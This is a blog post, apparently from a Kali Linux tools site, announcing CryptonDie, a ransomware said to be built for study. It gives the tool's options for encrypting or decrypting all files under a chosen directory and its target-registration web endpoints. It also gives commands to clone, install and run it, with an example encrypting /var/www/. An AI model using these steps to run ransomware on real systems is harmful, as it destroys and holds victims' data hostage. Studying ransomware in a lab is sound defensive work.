Categories: Kali Linux

Cryptondie : A Ransomware Developed For Study Purposes

CryptonDie is a ransomware developed for study purposes.

Options

–key key used to encrypt and decrypt files, default is random string(recommended)
–dir Home directory for the attack, default is /
–encrypt Encrypt all files
–decrypt Decrypt all files
–verbose Active verbose mode, default is False

Example:
python3 cryptondie.py –web-service http://127.0.0.1:5000 –dir /var/www/ –encrypt –verbose

Web service endpoints

GET – /targets – list all targets (returns in JSON format)
GET – /targets/ – list one target by id (returns in JSON format)
POST – /target/ – create new target

Also Read – Kube-Alien : Tool To Launch Attack On k8s Cluster

how to run?

Clonning repository

git clone https://github.com/zer0dx/cryptondie

Install requirements

pip3 install -r requirements.txt

Running web service

cd cryptondie/discovery
python3 service_discovery.py

Running in Docker

docker build -t cryptondie .
docker run -it cryptondie /bin/bash
python cryptondie.py –web-service http://127.0.0.1:5000 –dir /var/www/ –encrypt –verbose

Which encryption is implemented?

Advanced Encryption Standard

R K

Recent Posts

Website OSINT: Tools and Techniques for Reconnaissance

Introduction When it comes to cybersecurity and ethical hacking, one of the most effective ways…

52 minutes ago

Top OSINT Tools to Find Emails, Usernames and Passwords

Introduction In the world of cybersecurity, knowledge is power. One of the most powerful skillsets…

15 hours ago

Google Dorking in Cybersecurity: A Complete Guide

Introduction In the vast ocean of the internet, the most powerful tool you already have…

1 day ago

Pystinger : Bypass Firewall For Traffic Forwarding Using Webshell

Pystinger is a Python-based tool that enables SOCKS4 proxying and port mapping through webshells. It…

2 weeks ago

CVE-Search : A Tool To Perform Local Searches For Known Vulnerabilities

Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…

2 weeks ago

CVE-Search : A Tool To Perform Local Searches For Known Vulnerabilities

Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…

2 weeks ago